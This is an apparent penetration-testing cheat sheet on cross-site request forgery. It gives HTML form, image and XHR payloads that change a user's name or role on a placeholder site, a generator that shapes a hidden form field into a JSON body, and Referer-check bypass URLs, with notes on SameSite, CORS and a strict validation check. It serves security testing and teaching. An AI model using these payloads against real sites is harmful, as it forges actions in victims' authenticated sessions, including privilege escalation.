# Cross-Site Request Forgery

> Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP

## Summary

* [Tools](#tools)
* [Methodology](#methodology)
* [Payloads](#payloads)
  * [HTML GET - Requiring User Interaction](#html-get---requiring-user-interaction)
  * [HTML GET - No User Interaction](#html-get---no-user-interaction)
  * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction)
  * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction)
  * [JSON GET - Simple Request](#json-get---simple-request)
  * [JSON POST - Simple Request](#json-post---simple-request)
  * [JSON POST - Complex Request](#json-post---complex-request)
* [Bypass referer header validation](#bypass-referer-header-validation)
  * [Basic payload](#basic-payload)
  * [With question mark payload](#with-question-mark-payload)
  * [With semicolon payload](#with-semicolon-payload)
  * [With subdomain payload](#with-subdomain-payload)
* [References](#references)

## Tools

* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe)

## Methodology

![CSRF\_cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/Images/CSRF-CheatSheet.png?raw=true)

## Payloads

When you are logged in to a site you typically have a session. Its identifier is stored in a cookie in your browser and is sent with every request to that site. If another site triggers a request to it, the browser attaches the cookie as well, and the server handles the request as if the logged-in user had performed it. The payloads below assume the session cookie is actually sent cross-site: a cookie marked `SameSite=Strict` is never sent on a cross-site request, and a `SameSite=Lax` cookie (the default applied by current Chromium-based browsers when the attribute is absent) is sent on top-level navigations such as the link payload but not on cross-site POSTs or subresource loads such as `<img>`. Check the cookie attributes before building a PoC.

### HTML GET - Requiring User Interaction

```html
<a href="http://www.example.com/api/setusername?username=CSRFd">Click Me</a>
```

### HTML GET - No User Interaction

```html
<img src="http://www.example.com/api/setusername?username=CSRFd">
```

### HTML POST - Requiring User Interaction

```html
<form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
 <input name="username" type="hidden" value="CSRFd" />
 <input type="submit" value="Submit Request" />
</form>
```

### HTML POST - AutoSubmit - No User Interaction

```html
<form id="autosubmit" action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
 <input name="username" type="hidden" value="CSRFd" />
 <input type="submit" value="Submit Request" />
</form>
 
<script>
 document.getElementById("autosubmit").submit();
</script>
```

### JSON GET - Simple Request

```html
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://www.example.com/api/currentuser");
// Without this the browser omits cookies on a cross-origin XHR and the request arrives unauthenticated
xhr.withCredentials = true;
xhr.send();
// The response stays unreadable from the attacker's origin unless the server's CORS policy allows it,
// so a GET is only useful for CSRF when it has side effects
</script>
```

### JSON POST - Simple Request

```html
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.example.com/api/setrole");
// Send the victim's cookies with the cross-origin request
xhr.withCredentials = true;
// application/json is not allowed in a simple request (it triggers a CORS preflight); text/plain is the default
xhr.setRequestHeader("Content-Type", "text/plain");
// You will probably want to also try one or both of these. Setting multipart/form-data by hand omits the
// boundary parameter, so send a FormData object instead if the server needs a real multipart body
//xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
//xhr.setRequestHeader("Content-Type", "multipart/form-data");
// The value must be a JSON string; the server has to accept JSON despite the text/plain header
xhr.send('{"role":"admin"}');
</script>
```

### JSON POST - Complex Request

```html
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://www.example.com/api/setrole");
xhr.withCredentials = true;
// A non-safelisted Content-Type makes this a "complex" request: the browser sends an OPTIONS preflight
// first and only issues the POST if the server's CORS response allows the attacker's origin, this header
// and credentials. The payload therefore only works against a misconfigured CORS policy
xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhr.send('{"role":"admin"}');
</script>
```
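The distinction between the two JSON payloads above, and the reason `text/plain` is the workable Content-Type, can be checked without a browser. The following is an added example, not code from the original page: it encodes the CORS simple-request rules from the Fetch standard, reproduces the body a browser builds for a `<form enctype="text/plain">`, and shows how a single hidden field can be named so that the resulting body parses as JSON, which is the trick used to deliver JSON without a preflight. The `/api/setrole` scenario and the throwaway `pad` key are illustrative assumptions.

```javascript
// Added example, not code from the original page: why text/plain works for a
// cross-site JSON POST and how a form field can be shaped into a JSON body.

// CORS-safelisted ("simple") request rules from the Fetch standard: these
// methods, headers and Content-Type values are sent without a preflight.
const SAFELISTED_METHODS = new Set(["GET", "HEAD", "POST"]);
const SAFELISTED_HEADERS = new Set(["accept", "accept-language", "content-language", "content-type"]);
const SAFELISTED_CONTENT_TYPES = new Set([
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
]);

// True when the browser would issue the request directly (no OPTIONS preflight).
// Cookies still ride along only if the request is credentialed (a form submit,
// an <img>, or XHR/fetch with credentials enabled).
function isSimpleRequest(method, headers) {
  if (!SAFELISTED_METHODS.has(method.toUpperCase())) return false;
  for (const [name, value] of Object.entries(headers)) {
    const lower = name.toLowerCase();
    if (!SAFELISTED_HEADERS.has(lower)) return false;
    if (lower === "content-type") {
      // Parameters such as ";charset=UTF-8" do not affect the safelist check.
      const essence = value.split(";")[0].trim().toLowerCase();
      if (!SAFELISTED_CONTENT_TYPES.has(essence)) return false;
    }
  }
  return true;
}

// The body a browser builds for <form enctype="text/plain">: one "name=value"
// line per field, each terminated by CRLF, with no percent-encoding.
function textPlainFormBody(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join("");
}

// Split a JSON object across a single hidden field so that "name=value" is
// itself valid JSON. The unavoidable "=" lands in a throwaway key (assumed
// name "pad") that the target endpoint is expected to ignore.
function jsonCsrfField(payload, padKey = "pad") {
  const json = JSON.stringify(payload);                  // {"role":"admin"}
  const prefix = json === "{}" ? "{" : json.slice(0, -1) + ",";
  const name = `${prefix}"${padKey}":"`;                 // {"role":"admin","pad":"
  const value = '"}';                                    // closes the string and the object
  return [name, value];
}

// Render the field as the hidden input used in the "HTML POST" payloads above.
function jsonCsrfInputHtml(payload) {
  const [name, value] = jsonCsrfField(payload);
  const esc = (s) => s.replace(/&/g, "&amp;").replace(/"/g, "&quot;");
  return `<input type="hidden" name="${esc(name)}" value="${esc(value)}" />`;
}

// Walk through the page's /api/setrole scenario and return what a server would see.
function demo() {
  const field = jsonCsrfField({ role: "admin" });
  const body = textPlainFormBody([field]);
  return {
    body,                                   // '{"role":"admin","pad":"="}\r\n'
    parsed: JSON.parse(body),               // { role: "admin", pad: "=" }
    textPlainIsSimple: isSimpleRequest("POST", { "Content-Type": "text/plain" }),
    jsonIsSimple: isSimpleRequest("POST", { "Content-Type": "application/json;charset=UTF-8" }),
  };
}
```

`demo()` returns the text/plain body `{"role":"admin","pad":"="}` followed by CRLF, which `JSON.parse` accepts, and reports the `text/plain` POST as simple and the `application/json` POST as requiring a preflight. Whether the real endpoint tolerates the extra `pad` key and the `text/plain` Content-Type is what you have to confirm against the target.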

## Bypass referer header validation

Some applications accept a state-changing request only when the `Referer` header points at their own domain. When that check is a substring or prefix match rather than an exact comparison of the parsed host, the trusted domain can be planted in the path, in the query string, or as a subdomain of an attacker-controlled origin, as in the payloads below. Also test the request with the header absent altogether (an attacker page can set `<meta name="referrer" content="no-referrer">`): a check that fails open on a missing `Referer` is bypassed without any of these tricks.

### Basic payload

```
1) Open https://attacker.com/csrf.html
2) Referer header is ..

Referer: https://attacker.com/csrf.html
```

### With question mark(`?`) payload

```
1) Open https://attacker.com/csrf.html?trusted.domain.com
2) Referer header is ..

Referer: https://attacker.com/csrf.html?trusted.domain.com
```

### With semicolon(`;`) payload

```
1) Open https://attacker.com/csrf.html;trusted.domain.com
2) Referer header is ..

Referer: https://attacker.com/csrf.html;trusted.domain.com
```

### With subdomain payload

```
1) Open https://trusted.domain.com.attacker.com/csrf.html
2) Referer header is ..

Referer: https://trusted.domain.com.attacker.com/csrf.html
```
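The four payloads above, run as an added example (not from the original page) against two reference implementations of the check: a substring match of the kind these payloads defeat, and a host-based comparison written to reject all of them. `trusted.domain.com` and `attacker.com` are the page's placeholder domains.

```javascript
// Added example, not code from the original page: a weak and a strict
// Referer check run against the four bypass payloads above.

const TRUSTED_HOST = "trusted.domain.com"; // the page's placeholder for the target site

// Weak check: passes any Referer that merely contains the trusted domain.
// This is the shape of logic that the query-string, semicolon and subdomain
// payloads get through.
function refererCheckWeak(referer) {
  return typeof referer === "string" && referer.includes(TRUSTED_HOST);
}

// Strict check: parse the header as a URL, require https, and compare the
// hostname exactly (or a true subdomain, matched on a dot boundary so that
// trusted.domain.com.attacker.com is rejected). A missing or unparseable
// Referer is rejected too: a check that fails open on a missing header can be
// bypassed by an attacker page that suppresses the Referer via Referrer-Policy.
function refererCheckStrict(referer) {
  if (typeof referer !== "string" || referer.length === 0) return false;
  let url;
  try {
    url = new URL(referer);
  } catch {
    return false;
  }
  if (url.protocol !== "https:") return false;
  const host = url.hostname.toLowerCase();
  return host === TRUSTED_HOST || host.endsWith("." + TRUSTED_HOST);
}

// The Referer values produced by the four payloads above.
const REFERER_PAYLOADS = [
  "https://attacker.com/csrf.html",
  "https://attacker.com/csrf.html?trusted.domain.com",
  "https://attacker.com/csrf.html;trusted.domain.com",
  "https://trusted.domain.com.attacker.com/csrf.html",
];

// Evaluate a list of Referer values against both checks.
function evaluateReferers(referers = REFERER_PAYLOADS) {
  return referers.map((referer) => ({
    referer,
    weak: refererCheckWeak(referer),
    strict: refererCheckStrict(referer),
  }));
}

// The payloads that slip past the weak check but not the strict one.
function weakBypasses(referers = REFERER_PAYLOADS) {
  return evaluateReferers(referers)
    .filter((r) => r.weak && !r.strict)
    .map((r) => r.referer);
}
```

`evaluateReferers()` shows the basic payload failing both checks, the question-mark, semicolon and subdomain payloads passing the weak check, and none of the four passing the strict one; a legitimate `https://trusted.domain.com/...` or `https://app.trusted.domain.com/...` Referer passes the strict check while a plain-http one does not. When auditing a target, the host-based check is the behaviour to look for; anything that can be satisfied by `includes` is a finding.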

## References

* [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
* [Cross-Site Request Forgery (CSRF) - OWASP](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_\(CSRF\))
* [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton](https://whitton.io/articles/messenger-site-wide-csrf/)
* [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
* [Hacking PayPal Accounts with one click (Patched) - Yasser Ali](http://yasserali.com/hacking-paypal-accounts-with-one-click/)
* [Add tweet to collection CSRF - vijay kumar](https://hackerone.com/reports/100820)
* [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/)
* [How i Hacked your Beats account ? Apple Bug Bounty - @aaditya\_purani](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
* [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones](https://hackerone.com/reports/245346)
* [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
* [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
* [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0)
* [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
* [Bypass referer check logic for CSRF](https://www.hahwul.com/2019/10/11/bypass-referer-check-logic-for-csrf/)

